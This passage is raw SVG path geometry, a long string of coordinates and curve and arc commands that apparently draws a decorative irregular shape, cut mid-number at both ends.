3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.91,97.91,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.8-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.15,66.15,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7q1.65.3,4.2.6c1,.1,2.1.2,3.5.3,5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1a24.24,24.24,0,0,1-3.2.3c-2.1.1-3.8.2-1.6.6-.9-.2.2-.2,1.5-.1,1.1.1,2.4.2,2.8.2a5.67,5.67,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.52,31.52,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a27.09,27.09,0,0,1-3.1-.3,17.94,17.94,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.09,41.09,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.06,9.06,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.82,31.82,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a4,4,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.81.2,1.91.3.41.4,11.19.3.19-1.1,0-1.6s10.4,0,9.09-.7a35.68,35.68,0,0,0-4,.1c-2.19-.5-5.59-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.19-.3-6.19-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.59,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-3.7-1.5,5.5-1.6-7.2-1.3-3.3-3.2,2.1-3.9a14.11,14.11,0,0,0,2.9.2c-.4-.3-1.3-.5-3.4-.7-.1.1-.2.3-2.6.2-.7-.8,1.2-.9.1-1.4,2.1.1,3.7.2,5.9.4-2.5-.7,4.1-.6,1.6-1.3-3.9,0-3.7.3-7.1-.2a27.6,27.6,0,0,0,5.3-.3c-2.3-.3-5.8.1-7.3-.4.4-.7-1.2-.7-2.7-1.5,5.6.2,4.7-.5,9.6-.1.3-.7,3.6-.7-2.5-1.3,4.4.3,5.4-.1,10,.3.1-.2-1.8-.3-1.8-.5-3.1,0-7.5.1-8.6-.3,2-1.1,6.3-2.5-1.7-3.5,2.5,0,4.4.1,5.8.2-.2-.2-.3-.4-.5-.6-3.6,0-5.2-.2-4.6-.4,6.1.4,2.5-.2,8.31,0,4.09.6-1.5.9-2.91,1.5,7.9.4,6.31,1.6,2.5,1.9,7.9-.3,6.81-1.8,4-2.4,3.2-.6,7.5-1.1,8.1-1.9a20,20,0,0,1-4.5-.4c-4.4-.2-4,.1-8.4-.1-1.7.4,4.1.3,3.3.6-6.9-.3-3.09.4-9.59.1.8-.5,6.4-1.1-1.31-1.4-.19-.2-.3-.4-.5-.6,1.9.2,5.31.2,7.31.4.19-.6-7.5-.1-7.6-.7,2.3-.2,5.69-.1,1-.4,4.5-.2,7.8.4,9.9.2-2.4-.1-3-.8-.7-.8a28.18,28.18,0,0,1,5.8.3c-7.3-.3,1.2.7.9,1-2,.1-5.7,0-6.8.2,6.9.2,1.1.6.7.8,9.1.1,6.7-.6,7.6-.8,4.4.1,1.3.4,6.19.7-1.59-.5-5.9-1,.41-1.1-3.7-.1.69-.7-6.2-.7-1.7.3,4.4.7.6.7-6.7-.6.3-.7,1.8-1-4.7-.2-.8.3-5.5.1-.1-.1-1.3-.2-1.6-.3-.9-.6,2.2-.6,6.1-1-1.1-.3-2.1.1-4.2,0-.1-.2-.9-.3-1.7-.4a29.51,29.51,0,0,1,5.4-.2c3.7.1,1.5.5,6,.5-1.5-.5-2-.6.6-.9-1.5-.3-6.2-.3-6.1-.7.2-.2,3.6-.1,3.8-.3-2.2-.2-4.4-.9-1.2-1.3-2.9-.2-4-.5-6.2-.7-1,.5,2.5.8-2,.9-.8-.1-1.7-.3-3.1-.4,0,.3,2.5.4,3.3.6-8.8-.3-.5.7-3.6.7-1.9-.1-2.8-.2-5.8-.2,4.2.7,6.8,1.7-1.1,1.9,8.3.1,2.8,1.2-3.7.6.5.6,4.2.3,6.2.7-2.6,0-3.3.2-6.9.1-8.2-1.2-2.7-1.7,3.4-2.4-4.5-.8-1.7-1-4.1-1.5,1.4,0,2.8.1,4.3.1-3.9-.2-2.3-1.3-6.5-1,3.7.3,1.7,1-1.9.9-1.6-.7,1.5-1-.1-1.7a29,29,0,0,0,6.9-.1c-8.3-.2-6.2-.8-1.9-.6-1.9-1,3.8-1.9-1.4-3.2,5.4-.1,5.3-.7,1.7-1.2a41.25,41.25,0,0,1,4.3.2c-1.9-.5,1.1-.5,3.7-.6-4.2-.5-4.8.3-7,0a13.65,13.65,0,0,1,5-.7c-.1-.8-5.1-2.5.1-3.1-5-.8-7.6-4.5,1.6-2.9.7-.7-2-1.7-2-2.2,1,.6.7-.2,5.7.1-1.5-.4-2.1-.4.9-.5-6.7-.2,1.7-.7-3.7-1.1.1.1-1,.1-1.4,0h8.3c3.9.4,1.1.4,3.5.8,4.8-.1,4.7.2,8.7.4-3.4-1.5-1.3-1.2.7-2.4-5.2-.2-1.3.5-5.2.4-.2-.2-.3-.4-.5-.6-2.6,0-4.7,0-5.5.1,5.2.1-.6.3,4.6.5-1.1.1-.7.4-5.4.2-.5-.2.9-.5-3.2-.5,1.3.3,2.5.6-.8.6-5.4-.7.6-2-5.4-3,4.6-.2,5.6-2.2-2-2.3,3.1-.2,2.2-.1,6.8-.2,1.8.4-2.1,1.1,3.9,1.3-1.4-.5-3.7-1.3,3.6-.7,0-.3-4.5-.4-4.7-.7,1.9,0,3.8.1,5.7.1.1.2.2,1.1,3.4.7-4.1-.3-.4-.7.6-.9-3-.3-4.9-1.5,2.9-1.5,1.6.1,2.3.2,3,.3-.1.4-3.7.8.9,1a58,58,0,0,1-7.1-.2c-.1.5,4.3.2,6,.5-2.8.1-5.6.2-.9.5,4.3-.2,7.2-2,1.7-2.8,5.5-.3-5.2-1.9,9.6-1.7-1.6-.3-1.3-.9,3.4-.9.7-.3-4.1-.3-3.3-.6,2.6-.6,8.2-.3,16.3-.4-7.9-.2-7.2-1-3.9-1.3a21.78,21.78,0,0,1,3,.3c4.5-.3-7.8-.8-.8-.9,4.4-.1,2.5.7,4.4.3-3.6-.5,4.1-.4-2.1-.8.7-.2,4.1-.1,5.4-.2-5.9-.4-6.3-2.4,3.9-1.9-6.5-2.2,6.1-4.8,5.3-6.6,2.7.1,6.1.2,6,.5-1.9,0-6.3,0-1,.4-.4-.2,1.2-.2,4-.1,2,.4-3.7.6.8.9.3-.3,1.7-1,1.7-1.3-1.5-.1-6.6-.2-8.8-.5,10.4.4.7-.4,5.1-.5,2.3.4,8.5.3,5.6,0,.1.3-4.7-.1-4.4-.2,1.2-.4,14.8-.2,9.1-.7-3.4-.1,1.2.5-4,.2-5.8-.3.3-.7.5-1-8.6-.4-11.4-1-9.7-1.5.7.5,2.7.3,7.3.4-.1-.7-2.1-1.2,2.7-1.7.5.2,0,1.1,2.1.8-2.1-.6,3.6-.5,6.8-.2-3.1-.6,2.5-.5-2.3-1,1.8,0,1.8-.1,4.2,0s3.4.3,3.2.5c5.9-.2,6.5-.3,10.6-.6-3.7-.2-4,.3-5.6,0,1.2-.4-3.4-.5-3.5-.8,6.7.2,3.8-.5,6.4-.6,6.4.6-4.8.8,2.5,1.3-.3-.3,1.6-.6,6.6-.4,1.1.3-1.1.8,2.19.9,2.2-.5-.69-1,8.9-.9-6.3-.3-.4-.9-5.4-1.4,2.7-.1,2.81.1,5.6,0-2.69-.4,4.8-.3.9-.5.1.3-4.69-.1-4.4-.2,3.6.1,2.5-.3,2.31-.6,4.4.2,4-.1,8.4.1-5.1-1.2,5.4-1.7,3.09-2.8,2,0,7.4.3,7,0-4.3-.3-5.8-.7-3.59-1a21.48,21.48,0,0,1,3,.3c2.91-.4-1.4-2.1,8.6-1.3-4.5-.5-8-1.6.2-1.3-1.3-.4-6.5-.2-7.3-.4,11.4-.8,2.1-2.3,8.8-3.2,6.2,1,4.4.1,5.3-.1-1.7-.3-2.3-.6-3.6-.9,0-.1-.4-.2-1.8-.4-.3-.1-.7-.1-1.1-.2.2,0,.4.1.6.1-.4,0-.7-.1-1.2-.1a31.52,31.52,0,0,1,4-.2l1.2.3a1.25,1.25,0,0,1-.6-.1c0,.3.1.6,2.4,1-.19-.2-.1-.2.1-.3a3.88,3.88,0,0,1,1.6,1,4.91,4.91,0,0,1-.5-.1c.2,0,.3.1.5.1a.79.79,0,0,1,.2.7h0c0,.1-.1.3-.1.4a5.54,5.54,0,0,0-1-.2c-3.2-.2.1.8-2.5.8a24.16,24.16,0,0,1,4.3.9c-3.1-.5-4-.2-1.8.4-2.1-.1-3.4-.7-5.2-.8,2.8.5,2.5,1.1,3.5,1.2,0-.1.2-.2,2,.1,2.1.5-.7.2.3.7,3.91.7,1.6-.2,3.91.1-.81.5,3.19.6,3.19.6,4.1,1-1.4.4-3.9,0,4.1.6,7.5,1.6,8.3,1.3-4.4-.9,1.7-.1-2.5-1.2a21.08,21.08,0,0,0,4.1.5c-2.2-.6-4.4-.5-5.4-1.1,1.4-.7,10.6,1.5,9.7,2.1,2.1.1,1.4,0,.7-.5,3.6,1,2.4.2,4,.3,1.3.4,1.1.6,1.3.9a5.08,5.08,0,0,1-.8.3,3.07,3.07,0,0,0-1-.2c.5.3.3.4,0,.5-.5.1-1.1.3-1.7.4,1.3.7,1.6,1.4,1.7,2-.2,0-.4-.1-.6-.1,1.5-.3-1.3,0-5.2-.9.3.2-.2.4,1.3.7.1-.7,2.5,1,4.2.8-2-.4-1.1-.4.4-.3a1.52,1.52,0,0,0,.1.6c-1.2,0-2.8-.1-3.1.2,1.5.3,2.6.5,3.3.7a3,3,0,0,0,.4.7h-1.09a10.53,10.53,0,0,0,1.4.3,5,5,0,0,0,1.1.7c-.7,0-2.91-.4-3.1-.3,4,.8-.1.4,3.4,1.1a19.63,19.63,0,0,0-2-.2,13.53,13.53,0,0,0-2.3-.7c-.91,0-1.1,0-.91.1-3.8.7,8.1,2.3-3.09,2.4a5.23,5.23,0,0,0-1.31-.1c-2.1-.4-1.69-.7-4.69-1.2a11.09,11.09,0,0,0,3.5,1.2c-.1-.2,1.8.2,2,.1a4,4,0,0,1-.5-.1c6.4.4,2,.5.5.9,3.9.2,6,.5,1.9.6,9.5.6,1.8-.5,3.19-1.1a9,9,0,0,0,3.1,0c.2.1.5.2.9.4.7-.1,4,1,5.5,1.4,1.1-.4-6.5-2.1-.69-1.6a12.16,12.16,0,0,0,4.3.9c-1.3-.4-2.8-.8-4.4-1.2-.9-.6,1.5-.4,2.69-.4-1.59-.3-3.8-.6-4.3-.8h.4c1.31.3,2.81.6,4.7,1,.8,1.5,4.6,3.6,1.8,5.2,10.7-.4-2.6-2.5,7-3.1,1.9.1,4.1.2,6.1.2.5.2.3.3,3.1.6-2.1-.1.4.5,1.3.9,1.5-.4,1.6-1,1.5-1.6a87.43,87.43,0,0,1,12.3-.9c-2.4-1.2,3.31-2.2,10.5-2.8-.8.3-1.8.5-.2,1-.09-.1.31-.2,1,.1.31.4-5.19-.7-5-.3,2.5.5,4.31.3,5.2.8-3.5-.3.1.2,1.3.7-2.19-.2-1.69.3-3.9-.1,7.5,2.1-1.3,1.5.2,2.5-3.9-.6-3.8-.2-4.9,0,3.9.7,1.7-.3,5,.3-1.4.8,3.8,3.1,7,4.6-2.8-.4-2.2-.6-4.3-.9-.6.3,4.1.9,4.5,1.3-4.3-.2-10.3-.5-3.3,1.2.1-.2-.6-.5.8-.3.1.3,5.7,2.1.8,1.7a39.85,39.85,0,0,1-4.4-1.1c1.4.2,1.8.1,1.9-.1-3.3-.5-2.9-.8-5.4-1.2-1.3.2,3,.7,2.4,1-2.9-.5-2.2-.6-4.2-.7,2.4.6,3.1,1.4,5.6,1.6-4.5-.5,2.4,1.6-2.4,1.2-2.7-.5,2.5-.2-2.4-.9-.6.1-.4.5.5,1,4.6.9-1-.4,2,.1,4.6.7,3.8,1.7,6.7,1.9-4.4-1.4.2-1.5-4-2.3,2.8.2,3.2-.2,6.9.3,0,.4.5.4,1.6,1.3-3.1-.4-10.1-.8-1.6.6-1-.6.7-.4,2.9-.1-2.3,0,3.5,1.1.4,1,4.6.7.8-.8-.6-1.2,1.3.2,1.5.4,3.2.6-2.5-1.8.9-2.1,4.6-2.7-5.4-.9-3.1.2-8-.6a8,8,0,0,0-1.2-.4c3.3.5,3.4.2,2.8-.3,3.6.6,4.4.5,6.1.7-7.1-1.7-3-2-1.1-2.3a20.39,20.39,0,0,1,2.2.6c1.2-.5.7-1-2.7-1.7,2.2.4-2.7-1.1.6-.7.7.2,3.4,1,4.2.8-3.2-.7-3.4-1.3-3.8-1.8a25,25,0,0,0,5.1.5c-1.8-.6-4.8-.6-6.4-1.2,4.1.4.3-.9,5.6-.4q-4.05-.6-3.3-.9c1.2.2,7,1.4,4.2.7-3.8-.5-3-1.3-.4-.8-.3.8,6.2,1.4,7.9,2.4a16.72,16.72,0,0,0-2-.2c-2.1-.3-1.5-.6-4.3-.9-.3.5-2.9,0,.4,1a25.83,25.83,0,0,1-5.1-.6c-.2.4,5.2,1.1,5.5,1.5s-1.6.1-.7.5c-1.1-.2-2.1-.4-3.1-.5,2.3,1-.2.2,3.5,1.4-1.2.2-4.2-.2-7.1-.6.8.4,5.8.9,6.4,1.3,0,.6,2.2,1.3-.4,1.3-1.7-.3-.7-.4-2.3-.7.1.2.2.3.2.5,3.4.6,3.1.3,5.3.9-3.4-1.8,2.9-1.7-1.6-3.5a45.32,45.32,0,0,1,5.2.8c-1-.7-1.8-1.3-3.3-.9a20.16,20.16,0,0,0-2.3-.8c4.6.8,5,.2,1.8-.3,3.7.6-2.4-.8.9-.2,3.3.4,2.8,1,4.6,1.7,2.9.1-1-1.3-1.9-2,4.7,1.2-.3-.9,2.7-.4,1.8.3,2.5,1.1,4.4,1.1-3.4-1-1.8-1.3-7-2.5,6.9.5-7.2-3.1,1.7-2.5-3.3-.7-1.8-1-.5-1.1,2.4.4-.2.6,4.4,1.2-.5-.5-2.1-1-4.6-1.5.2-.2,2.7.2,2.9,0-1.9-.3-3.9-1.2-2.4-1,1.2.2,1.2.4,1.2.5a10.4,10.4,0,0,0,4,.3c-1.6-.3-3.9-.6-4.3-.8a47.94,47.94,0,0,0,9.8.2c-5.3-.9,1.7-.4-4.5-1.3-.1.4,3.1,1.5-.8.4-2.4-.1,1.8,1-.6.8a15.24,15.24,0,0,1-2.1-.4c-.8-.7,5.2-.1,1.3-1.3-.1.1.3.4-.9.2a8,8,0,0,0-1.2-.4c.3-.2,4,.6,2.9,0-5.6-.6.1-1.1-7.9-2.4,3.8.4-.8-.3-.3-.7a19.35,19.35,0,0,0,2,.2c1.9.3,3.8,1.2,5.4,1.1-2.6-.5.1-.7-3.5-1.2.9.3-1.8.2-2-.1-1.3-.6,6.1.5,1.7-.6a5.55,5.55,0,0,1-2.1-.2c3.1,0,.8-.8,1.4-1.2a16.44,16.44,0,0,0,4.6,1.7c-1-.7.2-.7,2.7-.4-3.7-.7-5.3-.6-6.3-1.2,3.1.5.9-.5,3.9,0-3.6-.4-5.6-1.3-6.4-1.2,3.8,1-2.6-.4-2-.1,1.7.2,2,.9.3.6.3-.2-2.5-1.2-3.4-1.1,2.6.4.4.4-.9.2a4.69,4.69,0,0,1-.6-.2l1.2-.6a13.09,13.09,0,0,0,3.9.1c-1.6-.3-2.6-.4-3.4-.5.3-.2.5-.4.4-.7a11.17,11.17,0,0,0,2.7.8c-1.4-.8-2.1-1.9,1.1-1.7,1.4.9.6.9-1.4,1.1,5.7.9,6.9,1.3,12.8,2.5.6-.3-3.3-1.3-3.5-1.2-1.2.1,4.3,1.1,1.3.7-3-.6-4.9-1-5.5-1.5,3.4.3.5-.4,1.7-.6,4.2.9,2,0,4,.3,2.1.6.2.3.3.6,6.5,1-.1-.5-.4-.8,1.8.3,3.3.6,4.2.8a5.7,5.7,0,0,0-2.3-.8c-1.2.3-9.2-1.6-7.7-1.9a26.05,26.05,0,0,1,5.2.8c.1-.2-1.3-.5-1.3-.7,3.8.7,2.6,0,6.1.6-1.4-.7-.2-.6-3.5-1.2-3-.4-.1.4-1.9.1-1.6-.3-4-1.2-1.4-.9,3.4.6,5.6,1.2,6.2.8-5.4-.6-.8-.3-3.3-.9a41.57,41.57,0,0,1-7.2-.9c-.7-.8,1.5-.6,1.5-1,1.3.5,1.1.9,3.6,1.5,3.7.1-2.3-1.7,2.3-1.3-2.6.1,2.7.9,4.6,1.5,1.3-.1,3.3.7,4.1.6a16.33,16.33,0,0,1-4.4-1.1c3.3.5,4.5.1,7.1.7-1.6-.8-6.3-2.3.2-1.8,1.1.4-3-.1.2.5,0-.1.8,0,1.1.2.5.4-4.8-.9-3-.2,5.3,1,4.4,1.7,7,2.6-2.9-.6-1.9-.1-3-.2a11.42,11.42,0,0,1,3.1.8,3.7,3.7,0,0,0,1.1.1,5.44,5.44,0,0,1-1.1-.3c-.4-.1-.3-.1,0-.1.7,0,2.4.2,1.9,0a6.07,6.07,0,0,1-1.9-.5c-.3-.1-.2-.2,0-.3s1-.3,0-.7a4.76,4.76,0,0,0-.9-.3,3,3,0,0,1,.9.2,18.66,18.66,0,0,1,3.4.7c-.3,0-2.4,0,.2.5.2-.2,1.5-.2.7-.7-1.9-.3-2.5-.5-2.3-.7-.8-.1-1.4-.2-2-.3a14.26,14.26,0,0,1-3.4-.8c1.6.2,2.6.5,3.4.6s1.4.3,1.8.1c-.6-.1-1.2-.3-1.8-.4-3.5-.8-6.3-1.5-9.1-2.2,3.4.7,2.5.2,4.1.5a2.76,2.76,0,0,0,1.2.4c-1.3-.7,2.9.6,3.9.5h0c-6.8-1.3-1.7-.7-6.5-1.9,3.4.7,2.2.5,4.2.6.4.6.3.2,2.4.5.3,0,.5.1.8.1A8.44,8.44,0,0,0,880,5a16.62,16.62,0,0,0-2-.3q-.45,0,0,.3a5,5,0,0,0,1.2.3c.3-.2,5.5.8,6.3,1a20.88,20.88,0,0,0-5.8-2c.7-.4,1.3-.8,5.9.2.3.3-2.2-.1-2.9,0,2.8.9,3.8,1.6,5.9,2.2-1.8-.6,4.4.4,4.1.6-1.3.1-4.4.1-.7.7-5.8-.8-3.1.4-7.9-.3-.3.3,2.8.9,4.5,1.3-2.7-.4-1.5.2-2.9.1a19.45,19.45,0,0,0-5.1-.6c3.2.6-1.6.5,1.3.7a6.05,6.05,0,0,1,1.9,0c-.3.3,1.7.7,2.4,1.1,3.6.6,1.4-.3,6.1.7a2.68,2.68,0,0,1-1.8.3c-.7-.4-1.9,0-4.1-.5,1.6.7.2.6.6,1.2,5.6.9.4-.4,1.6-.7,8,1.3,6.8.2,13.1,1.1-1.2-.6-4.9-1.1-1.4-.9l-5.2-.9c-.3.3,3.3.8,2.4,1.1a8.82,8.82,0,0,1-2.9,0c-.5-.4-1.7-.7-2.6-1.3,3.7.7.9-.4,3.9.1-7.5-1.1-3.6.3-9.8-.3,1.4-.3,2.1-1,9.5-.3-.4-.3-1.7-.2-2.2-.5,1.1.2,1.2,0-.1-.2.6.3-2.5.1-3-.2,1.4-.1,1.4-.5,3.8-.3,2.2.4,1.2.6,3.4,1,.5-.1,1.4,0,1.9-.1-2.1-.4-6.9-1.5-3.4-1.1,1.9,1,1.7-.8,7,.5-.6-.4-3.5-.9-2.5-1.2,4.5,1,1.8.1,4,.3,2.2,1.6,4.5,3.7-2.5,2.9,1.2.9.6,1.1,1.8,1.7,1.4.2,2.3.4,3.2.6-.3-.4,4.5.5,5,.3-3.1-.4-5.1-.7-6.3-1,.7-.2-3.5-1.2-.4-.8,1.3.3,1.4.6,1.4.9,3.9.5,8.6.7,5.7-.3,0,.3.1.6-2.9.1.7-1.2-3.9-3.6,4.7-2.5.9.1,1.8.2,3,.4-4.1-.9,5.8.5.7-.7-1.1-.1-.1.4-3-.2a.74.74,0,0,0-.7-.3,9.16,9.16,0,0,1-2.5-.2c-.1-.2-.2-.5-.3-.7-4.5-.8-3.2,0-7.1-.6,3-.3,15.4.5,4.1-1.5a.26.26,0,0,0-.1-.2c2.5.3,4.5,1.1,5.2.9-1.6-.4-3.4-.7-3.4-1,4.7.8-1.1-.7,1.7-.5l2.4.7c2.5.9,2.4,1.6,1.9,2.1a9.18,9.18,0,0,1,2.2.6c4.2.9,5.2.4,7.3,1.1-2-.1-2-.2.2.4-2.9-.4-3.9-.2-3.7.3,5.7,1-.1-.4,2.9-.1,5.7,2.1-1,1.4,1.4,2.9,4.8,1,2.7,1.1,7.6,1.8-4-.5-6.4-.6-8.4-1.4-.8.2,3.2,1.3,4.5,1.3-.9-.3,2.8.7,3,.2a14.34,14.34,0,0,1,3.5,1.2c-1.9-.1-1.9-.4-5.2-.9-.4.4-.4.3.4.8,1.4.5,3.8.4,5.3,1a25.66,25.66,0,0,0-4.8,0c6.8,1.7,2.8,1.9,3.2,2.8-2.5-.5-7.1-1-4-.3,1.4.1,3.5.3,6.1.7-1.6.1-3.3-.1-.6.8-5.5-.9.3.6-3.8.1,1.6.3,5.4.8,5.3,1a.35.35,0,0,0,.1.2c-3.8-.6-5.1-1.1-8.5-1.6-1.3.2,4.7.8,3.4,1,3,.6,2.6.3,5.2.8-.8.4,3.2,1.6-1.3,1.3,4.1.8,2.2.8,3.5,1.2-.7.1-5.1-.9-4-.3,2,.3,2.4.5,4.2.8.1-.1.2-.2,2,.1,7.5,1.6,2.5,1.8,2.1,2.3-.1.1,5.3,2-1.8.4,1.2.5,2,1.1-2.8.2.5-.1,2.4.1,1.8-.4-3.1-.5-3.7-.9-6.5-1.4,1,.7-3-.7-1.9,0,.5.4,5.2.6,6.4,1.2a8.82,8.82,0,0,1-2.9,0c-.3-.2-2.4-.5-3.3-.8-.5.1-2.5.4-.6.8,1.8.2-.3-.6,1.8-.3s8.7,1.7,2.2.5c-.1.4,6.1,1.1,4.5,1.4a17.2,17.2,0,0,0-3.2-.5c.1.4,2.7.4,4.4,1.1a26.83,26.83,0,0,1-4-.3c3.2.9-1.8,1,4.6,1.5a2.68,2.68,0,0,1-1.8.3.17.17,0,0,1-.23.07.18.18,0,0,1-.07-.23l0,0a.16.16,0,0,1,.23,0h-.6c-.8-.2-1.6-.2-3.6-.6.2.2.3.3.3.4h-.3c-.9.2-.7.3,0,.4a6.32,6.32,0,0,1-1.3.4c2.5.6,3.8.3,4.2.7-2.7-.4,1.5.4.2.5-1.5-.2-3.9-.7-4.1-.6.3.5,2.4,1.4-1.5.9-.6-.3.9-.4-1.3-.8-2.9,0,3,1.3.6,1.2,1.4.2,2.8.5,4.2.7-.1.4,4.1,1.5-2.7.4,2.1-.1-3.8-1.5-7.7-1.9,0,.3.9.9-.6.8,1.5.5,3.1.3,4.2.8-1.6.1,4.4,2.1,2,2.2,2.1.2.6-.5,3.9.1,3.8,1.4-2.7,1.2-1,2.1a12.25,12.25,0,0,1,2.9-.1c1.6.8-1.6.7-1.2,1.6.1.2,1.9.4,2.2.6-.1.5-5.3.2-8.8-.2,7,1.3,6.3.5,9.1.7,2.7,1-2.8.3.6,1.3,1.6.2-.5-.6,2.9,0-2.1-1.3-5-2.8.8-2.4-1.8.4.8.4,3.5,1.2-.2.3-4,.2-2.7.6a5.85,5.85,0,0,1,2,.2c2.5.8-2.3.6.5,1-.2-.2.7-.2,1.9,0,2.7,1.4-1.9,1.2,3.2,2.6-7-1.1,1.5,1.9-5.4.9-.6-1.2.4-1.6-1.2-2.6-2.6-.2-2-.7-3.4-1.1-4.9-.2,1.3,1.7,3.1,2.5-1.3-.2-1.4-.1-3.1-.4.5-.3-2-.8-1.5-1.1-1.8-.2-5.6-.9-5.1-.5,2,.4,2.3.2,4.1.6a7.72,7.72,0,0,1,.4,1c-7-1-6.7-1.2-13.7-2.4,0-.1,1.3.1.9-.2a59.9,59.9,0,0,1-12-3c-2.9-.1,4.1,1.1,2.6,1.4a17,17,0,0,0-3.1-.5c3.3.5.7.7,4.4,1.2q-.45-.45,1.8-.3c.1.2,1.9.4,2.2.6,1.1.5-1.5.1-1.8.3a10.32,10.32,0,0,1,2.2.5c4.2.8-1.3-.6,4,.3,6.7,1.6,14.6,2.5,12.1,3.1-5.3-.6-2.6.3-1.4,1.1-1.4-.2-2.3-.4-3.2-.6-.3.2-2.8.7,1.7,1.5,2.3.4-1.5-.5-.3-.6,3.4.7,1.2-.2,4,.3,1.6,1.2-.5,1-5.7.3.4,1.1-2.3,1.2-2.7,2.6,2.5.6,3.8.3,4.2.7-1.7.1.8.6.5,1.1-1.6-.4-2.6-.6-3.1-.4,3.7,1-3.4,0,2.4,1.1-.3.2-3.2-.2-5-.4,1.4.4,3.9.8,5.4,1.1.5.3,0,.4-.8.4,1.4.4,3.9.8,5.4,1.1-1.1-.6,2-.1,3.9.1.5-.2-1.1-.5-1.4-.7.1,0,.2-.1.3-.1,1.3.2,2.6.4,4,.7.7.5-2.3.1,1.3.8,3.9.2-7.4-2-2.9-2-.5.5,2.8.6,4.4,1.1-.9-.8,9.8-.5,10.1.9,3.6.7,3.7.4,4,.2q-4.05-.6-3.3-.9c-1.9-.4-6.1-.9-6.4-1.2.7-.2,1.7-.4-1.5-1.1,4.7-1,1.1-3.8,2.2-5.6,1,.6,1,.6.4,1,6.1,1,2.7,1,3.5,1.2.9-.2,1.2.5,3.1.5,1,1-.8,1.4,4.2,2.8-.3-.9,6.7,1.5,6.2.8-6.4-1.5-5.3-2.1-1.9-2.1-1.2-.2-3-.5-3.2-.6,3.6.3,3.8,1.1,5.6,1.6A27,27,0,0,0,979,53c1.6.4,3.4.7,3.4,1-.8.3-2.1-.1-.7.7-1.4-.2-2.